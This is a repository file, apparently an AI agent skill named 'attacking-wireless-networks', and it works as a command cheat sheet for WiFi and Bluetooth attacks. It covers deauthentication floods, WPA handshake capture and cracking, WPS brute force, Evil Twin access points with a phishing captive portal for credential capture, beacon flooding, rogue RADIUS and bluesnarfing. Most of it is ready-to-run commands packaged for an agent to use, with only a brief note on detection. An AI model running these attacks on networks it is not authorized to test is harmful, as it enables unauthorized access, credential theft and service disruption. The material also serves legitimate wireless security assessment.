zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
master
gh-trilwu-secskills-secskills/skills/wireless-attacks/SKILL.md
Zhongwei Li 33a29e697a Initial commit
2025-11-30 09:03:09 +08:00

387 lines
7.1 KiB
Markdown
Raw Permalink Blame History

---
name: attacking-wireless-networks
description: Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.
---
# Attacking Wireless Networks
## When to Use
- WiFi penetration testing
- Wireless network security assessment
- WPA/WPA2/WPA3 cracking
- Evil Twin and rogue AP attacks
- Wireless reconnaissance
## Setup and Tools
**Enable Monitor Mode:**
```bash
# Check wireless interface
iwconfig
iw dev
# Enable monitor mode
airmon-ng start wlan0
# Creates wlan0mon
# Or manually
ip link set wlan0 down
iw wlan0 set monitor none
ip link set wlan0 up
# Disable interfering processes
airmon-ng check kill
```
**Essential Tools:**
- aircrack-ng suite
- Wireshark
- Kismet
- Reaver/Bully (WPS)
- Wifite (automated)
- hcxtools/hcxdumptool
- Fluxion (Evil Twin)
## WiFi Reconnaissance
**Network Discovery:**
```bash
# Scan for networks
airodump-ng wlan0mon
# Scan specific channel
airodump-ng -c 6 wlan0mon
# Scan and save to file
airodump-ng -w capture wlan0mon
# Filter by BSSID
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
```
**Kismet:**
```bash
# Start Kismet
kismet
# Command line
kismet_server
kismet_client
# View in web UI
http://localhost:2501
```
## WPA/WPA2 Attacks
### Capture Handshake
```bash
# Method 1: Wait for client connection
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Method 2: Deauth clients to force reconnect
# In another terminal
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Or target specific client
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon
# Verify handshake captured
aircrack-ng capture-01.cap
# Look for "1 handshake"
```
### Crack Handshake
**Aircrack-ng:**
```bash
# Crack with wordlist
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# With specific ESSID
aircrack-ng -w wordlist.txt -e "NetworkName" capture-01.cap
```
**Hashcat:**
```bash
# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack WPA/WPA2 (mode 22000)
hashcat -m 22000 hash.hc22000 wordlist.txt
# With rules
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule
# Mask attack
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```
**John the Ripper:**
```bash
# Convert cap to john format
hccap2john capture-01.cap > hash.john
# Crack
john --wordlist=wordlist.txt hash.john
```
## WPS Attacks
### WPS Brute Force (Reaver)
```bash
# Check WPS status
wash -i wlan0mon
# Reaver attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# With delay (less aggressive)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 5
# Pixie Dust attack (if vulnerable)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K
```
### Bully (Alternative)
```bash
# Standard attack
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
# Pixie Dust
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon -d
```
## Evil Twin Attacks
### Fluxion
```bash
# Start Fluxion
./fluxion.sh
# Follow prompts to:
# 1. Select target network
# 2. Capture handshake
# 3. Create fake AP
# 4. Launch captive portal
# 5. Capture credentials
```
### Manual Evil Twin
```bash
# Create rogue AP
hostapd rogue_ap.conf
# Sample hostapd.conf:
interface=wlan0mon
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g
# DHCP server
dnsmasq -C dnsmasq.conf
# Sample dnsmasq.conf:
interface=wlan0mon
dhcp-range=10.0.0.10,10.0.0.100,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
# Captive portal (fake login page)
# Setup web server with phishing page
```
## WPA3 Attacks
### Dragonblood
```bash
# Dragonblood toolkit
# Tests WPA3 vulnerabilities (CVE-2019-13377, CVE-2019-13456)
# Dictionary attack (downgrade to WPA2)
# If SAE (WPA3) and WPA2 transition mode enabled
```
### Brute Force SAE
```bash
# hashcat WPA3 (experimental)
hashcat -m 22000 hash.hc22000 wordlist.txt
```
## Denial of Service
### Deauthentication Attack
```bash
# Deauth all clients
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth specific client
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon
# MDK3 (more aggressive)
mdk3 wlan0mon d -c 6
```
### Beacon Flooding
```bash
# MDK3 beacon flood
mdk3 wlan0mon b -f fake_aps.txt
# Create many fake APs
mdk3 wlan0mon b -n "FakeAP" -m -s 1000
```
## Automated Tools
### Wifite
```bash
# Automated WiFi cracking
wifite
# Target WPA only
wifite --wpa
# Target WPS only
wifite --wps
# Specific BSSID
wifite -b AA:BB:CC:DD:EE:FF
# With custom wordlist
wifite --dict wordlist.txt
```
### WiFi-Pumpkin (Rogue AP Framework)
```bash
# Launch WiFi-Pumpkin
wifi-pumpkin
# Features:
# - Rogue AP creation
# - MITM attacks
# - DNS spoofing
# - Captive portal
# - Traffic sniffing
```
## Enterprise WiFi (WPA-Enterprise)
### EAP-TLS/PEAP Attacks
```bash
# Capture EAP handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w eap_capture wlan0mon
# Extract RADIUS traffic
tshark -r eap_capture-01.cap -Y "eap"
# Rogue RADIUS server
# hostapd-wpe (Wireless Pwnage Edition)
hostapd-wpe wpe.conf
# Crack captured hashes
asleap -r capture.dump -w wordlist.txt
```
## Packet Injection Testing
```bash
# Test injection capability
aireplay-ng --test wlan0mon
# Fake authentication
aireplay-ng --fakeauth 0 -a AA:BB:CC:DD:EE:FF -h YOUR:MAC wlan0mon
# ARP replay attack
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h YOUR:MAC wlan0mon
```
## Hidden SSID Discovery
```bash
# Passive monitoring
airodump-ng wlan0mon
# Wait for client probe requests
# Active probing
mdk3 wlan0mon p -t AA:BB:CC:DD:EE:FF
# Deauth and capture beacon
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
```
## Bluetooth Attacks
### Discovery
```bash
# Scan for devices
hcitool scan
# Detailed info
hcitool info AA:BB:CC:DD:EE:FF
# Service discovery
sdptool browse AA:BB:CC:DD:EE:FF
```
### BluetoothHunting
```bash
# Bluesnarfing (file access)
bluesnarfer -b AA:BB:CC:DD:EE:FF
# Bluejacking (send messages)
echo "Message" | bluejack AA:BB:CC:DD:EE:FF
# PIN brute force
crackle -i hci0 -o pin.txt
```
## Quick WiFi Pentest Workflow
1. **Monitor Mode** - Enable monitor mode on wireless adapter
2. **Reconnaissance** - Scan for networks (airodump-ng/kismet)
3. **Target Selection** - Choose network (WPS-enabled for easy win)
4. **Handshake Capture** - Deauth clients and capture 4-way handshake
5. **Cracking** - Crack with hashcat/aircrack-ng
6. **Post-Exploitation** - Connect and perform MITM/sniffing
## Common Wins
- **WPS-enabled routers** - Often crackable in minutes with Reaver
- **Weak passwords** - Common WiFi passwords in rockyou.txt
- **WPA2 Transition Mode** - Allows downgrade attacks
- **Open guest networks** - No authentication required
- **Misconfigured Enterprise** - Weak RADIUS authentication
## Defense Detection
- Wireless IDS (WIDS) may detect:
- Deauthentication attacks
- Rogue access points
- Evil Twin attacks
- WPS brute force attempts
- Be aware of monitoring and physical security
## References
- https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
- https://www.aircrack-ng.org/
- https://github.com/wifiphisher/wifiphisher
- https://www.kali.org/tools/
Reference in New Issue View Git Blame Copy Permalink